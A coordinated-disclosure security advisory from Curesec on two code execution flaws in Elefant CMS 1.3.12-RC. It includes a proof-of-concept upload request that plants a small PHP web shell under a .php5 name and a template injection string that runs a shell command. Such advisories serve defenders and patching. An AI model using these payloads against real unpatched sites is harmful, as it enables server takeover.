Elefant CMS 1.3.12-RC: Code Execution

Elefant CMS 1.3.12-RC: Code Execution

Date: 2017-02-02 11:47:58
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Elefant CMS 1.3.12-RC
Fixed in: 1.3.13
Fixed Version Link: https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website: https://www.elefantcms.com/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 02/02/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits Tim Coen of curesec GmbH

2. Overview

Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution because of two different vulnerabilities. It allows the upload of files with dangerous type, as well as PHP code injection. To exploit this a editor or admin account is required.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file upload forbids the uploading of files with the .php extension, but allows uploading of files with a number of other dangerous extensions leading to code execution and XSS.

A user account is required which has the right to upload and manage files. By default, the editor or admin role have this right.

Proof of Concept:

POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=------multipartformboundary1472116478634 X-Requested-With: XMLHttpRequest Content-Length: 316 Cookie: PHPSESSID=57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page=%2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05 Connection: close --------multipartformboundary1472116478634 Content-Disposition: form-data; name="path" --------multipartformboundary1472116478634 Content-Disposition: form-data; name="file"; filename="test.php5" Content-Type: application/x-php <?php passthru($_GET['x']); --------multipartformboundary1472116478634--

PHP Code Injection

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The layout editor provides the option to create HTML templates. Additionally, it allows to use a small subset of PHP constructs, namely: {{ var }} {% foreach %} {% if %} {! handler !} {" text "}.

However, an attacker can use this functionality to execute arbitrary commands via a template.

An account with the right to edit themes is required. By default, the admin role has this right.

Proof of Concept:

Visit http://localhost/designer/add/layout Enter {{passthru('id')}} In the textarea.

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed
02/02/2017 Disclosed to public